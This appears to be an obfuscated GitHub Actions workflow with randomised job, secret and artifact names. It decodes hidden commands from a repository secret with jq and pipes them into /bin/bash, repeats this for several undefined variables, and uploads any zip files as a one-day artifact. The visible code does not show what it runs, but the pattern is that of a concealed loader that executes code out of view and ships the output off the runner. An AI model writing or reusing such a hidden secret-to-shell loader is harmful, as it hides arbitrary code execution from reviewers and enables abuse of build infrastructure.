name: benjamintitan407
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: benjamintitan407
        env:
          zklr06: ${{ secrets.zklr06 }}
        run: |
          printf '%s' "$zklr06" | jq -r .t9 | /bin/bash
          printf '%s' "$w8" | jq -r .pybfo6126 | /bin/bash
          printf '%s' "$td5993" | jq -r .bpp94 | /bin/bash
          echo $kvn88 | jq -r .wm58866 | /bin/bash
          echo $q7 | jq -r .xbd8 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: wKC8xhAA
          path: "*.zip"
          retention-days: 1
